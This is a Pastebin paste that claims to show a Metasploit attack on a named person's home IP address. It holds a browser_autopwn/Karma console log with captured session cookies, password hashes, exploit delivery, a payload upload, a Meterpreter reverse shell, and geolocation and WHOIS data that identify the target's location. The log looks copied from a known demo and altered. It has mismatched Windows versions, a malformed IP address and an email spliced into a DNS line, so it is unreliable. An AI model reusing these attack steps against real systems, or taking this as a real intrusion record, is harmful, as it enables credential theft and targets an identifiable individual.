Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- == == ==== =============================
- = = = = = = =========================
- = = = = = = = =
- = = = = = = = ===========================
- = = = = = = ========================== =
- = = = = = = = =
- = = = = = = = =
- = = = = = ====================== =
- ==== == == ===== ===========================
- Exploit lemodeurdu92 / 81.56.17.144 By Fame with metasploit
- root@kalifame:~# msfconsole -r karma.rc
- _
- | | o
- _ _ _ _ _|_ __, , _ | | __ _|_
- / |/ |/ | |/ | / | / _|/ _|/ / _| |
- | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
- /|
- |
- =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
- + -- --=[ 2 exploits - 46 payloads
- + -- --=[ 12 encoders - 3 nops
- =[ 49 aux
- resource> load db_JtebaiseMrJeuxMod
- [-]
- [-] The functionality previously provided by this plugin has been
- [-] integrated into the core command set. Use the new 'db_driver'
- [-] command to use a database driver other than sqlite3 (which
- [-] is now the default). All of the old commands are the same.
- [-]
- [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
- resource> db_create /root/Jtebaisefame#never.db
- [*] Creating a new database instance...
- [*] Successfully connected to the database
- [*] File: /root/Jtebaisefame#never.db
- resource> use auxiliary/server/browser_autopwn
- resource> setg AUTOPWN_HOST 10.0.0.1
- AUTOPWN_HOST => 10.0.0.1
- resource> setg AUTOPWN_PORT 55550
- AUTOPWN_PORT => 55550
- resource> setg AUTOPWN_URI /ads
- AUTOPWN_URI => /ads
- resource> set LHOST 10.0.0.1
- ...snip...
- [*] Using URL: http://0.0.0.0:55550/hzr8QG95C
- [*] Local IP: http://92.155.192.243.9953/hzr8QG95C
- [*] Server started.
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Server started.
- [*] Handler binding to LHOST 0.0.0.0
- [*] Started reverse handler
- [*] Server started.
- msf auxiliary(http) >
- msf auxiliary(http) >
- [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
- [*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
- [*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3; MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage; hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
- [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
- [*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
- [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
- [*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
- ...snip...
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
- [*] Request '/ads' from 10.0.0.100:1278
- [*] Recording detection from User-Agent
- [*] DNS 10.0.0.100:1292 XID 96 (IN:Fameofficiel@gmail.com:A gmail.google.com)
- [*] Browser claims to be MSIE 5.01, running on Windows 2000
- [*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
- [*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby/1.8/sqlite3
- ...snip...
- [*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
- [*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
- [*] HTTP REQUEST 10.0.0.100 > linkedin.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > livejournal.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > monster.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Sending MS03-020 Internet Explorer Object Type to 10.0.0.100:1278...
- [*] HTTP REQUEST 10.0.0.100 > slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Received 10.0.0.100:1360 LMHASH:00 NTHASH: OS:Windows 10 LM:Windows 10
- ...snip...
- [*] HTTP REQUEST 10.0.0.100 > www.monster.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
- [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
- [*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] AUTHENTICATED as TARGETP0WN3D...
- [*] Connecting to the ADMIN$ share...
- [*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Regenerating the payload...
- [*] Uploading payload...
- [*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Created UxsjordQ.exe...
- [*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Connecting to the Service Control Manager...
- [*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
- [*] Obtaining a service manager handle...
- [*] Creating a new service...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting UxsjordQ.exe...
- [*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
- [*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 10 2195 LM:Windows 10 5.0
- [*] Sending Access Denied to 10.0.0.100:1362
- [*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
- [*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
- [*] AUTHENTICATED as TARGETP0WN3D...
- [*] Ignoring request from 10.0.0.100, attack already in progress.
- [*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
- [*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
- [*] Sending stage (2650 bytes)
- [*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
- [*] HTTP REQUEST 10.0.0.100 > www.youtube.com:80 GET / Windows IE 5.01 cookies=
- [*] Sleeping before handling stage...
- [*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
- [*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
- [*] Uploading DLL (75787 bytes)...
- [*] Upload completed.
- [*] Migrating to lsass.exe...
- [*] Current server process: rundll32.exe (848)
- [*] New server process: lsass.exe (232)
- [*] Meterpreter session 1 opened (10.0.0.1:45017 -> 92.155.192.243.9953)
- msf auxiliary(http) > sessions -l
- Active sessions
- ===============
- Id Description Tunnel
- -- ----------- ------
- 1 Meterpreter 10.0.0.1:45017 -> 92.155.192.243.9953 ESTABLISHED
- 81.56.17.144
- [IP Blacklist Check]
- Reverse DNS: 144.17.56.81.in-addr.arpa
- Hostname: lon92-2-81-56-17-144.fbx.proxad.net
- Nameservers:
- ns1.proxad.net >> 212.27.32.130
- ns0.proxad.net >> 212.27.32.2
- IP Lookup Location For IP Address: 81.56.17.144
- Continent: Europe (EU)
- Country: France (FR)
- Capital: Paris
- State: Ile-de-France
- City Location: Suresnes
- Postal: 92150
- ISP: Free SAS
- Organization: Free SAS
- AS Number: AS12322 Free SAS
- something went wrong!
- something went wrong!
- Time Zone: Europe/Paris
- Local Time: 20:18:48
- Timezone GMT offset: 7200
- Sunrise / Sunset: 08:19 / 18:51
- Extra IP Lookup Finder Info for IP Address: 81.56.17.144
- Continent Lat/Lon: 48.69083 / 9.1405
- Country Lat/Lon: 46 / 2
- City Lat/Lon: (48.8714) / (2.2293)
- IP Language: French
- IP Address Speed: Broadband (Cable/DSL) Internet Speed
- [ Check Internet Speed]
- IP Currency: Euro, CFP Franc
- IDD Code: +33
- #
- # ARIN WHOIS data and services are subject to the Terms of Use
- # available at: https://www.arin.net/whois_tou.html
- #
- # If you see inaccuracies in the results, please report at
- # http://www.arin.net/public/whoisinaccuracy/index.xhtml
- #
- #
- # Query terms are ambiguous. The query is assumed to be:
- # "n 81.56.17.144"
- #
- # Use "?" to get help.
- #
- #
- # The following results may also be obtained via:
- # http://whois.arin.net/rest/nets;q=81.56.17.144?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2
- #
- NetRange: 81.0.0.0 - 81.255.255.255
- CIDR: 81.0.0.0/8
- NetName: 81-RIPE
- NetHandle: NET-81-0-0-0-1
- Parent: ()
- NetType: Allocated to RIPE NCC
- OriginAS:
- Organization: RIPE Network Coordination Centre (RIPE)
- RegDate:
- Updated: 2009-03-25
- Comment: These addresses have been further assigned to users in
- Comment: the RIPE NCC region. Contact information can be found in
- Comment: the RIPE database at http://www.ripe.net/whois
- Ref: http://whois.arin.net/rest/net/NET-81-0-0-0-1
- ResourceLink: https://apps.db.ripe.net/search/query.html
- ResourceLink: whois.ripe.net
- OrgName: RIPE Network Coordination Centre
- OrgId: RIPE
- Address: P.O. Box 10096
- City: Amsterdam
- StateProv:
- PostalCode: 1001EB
- Country: NL
- RegDate:
- Updated: 2013-07-29
- Ref: http://whois.arin.net/rest/org/RIPE
- ReferralServer: whois://whois.ripe.net
- ResourceLink: https://apps.db.ripe.net/search/query.html
- OrgTechHandle: RNO29-ARIN
- OrgTechName: RIPE NCC Operations
- OrgTechPhone: +31 20 535 4444
- OrgTechEmail: hostmaster@ripe.net
- OrgTechRef: http://whois.arin.net/rest/poc/RNO29-ARIN
- OrgAbuseHandle: ABUSE3850-ARIN
- OrgAbuseName: Abuse Contact
- OrgAbusePhone: +31205354444
- OrgAbuseEmail: abuse@ripe.net
- OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE3850-ARIN
- #
- # ARIN WHOIS data and services are subject to the Terms of Use
- # available at: https://www.arin.net/whois_tou.html
- #
- # If you see inaccuracies in the results, please report at
- # http://www.arin.net/public/whoisinaccuracy/index.xhtml
- #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement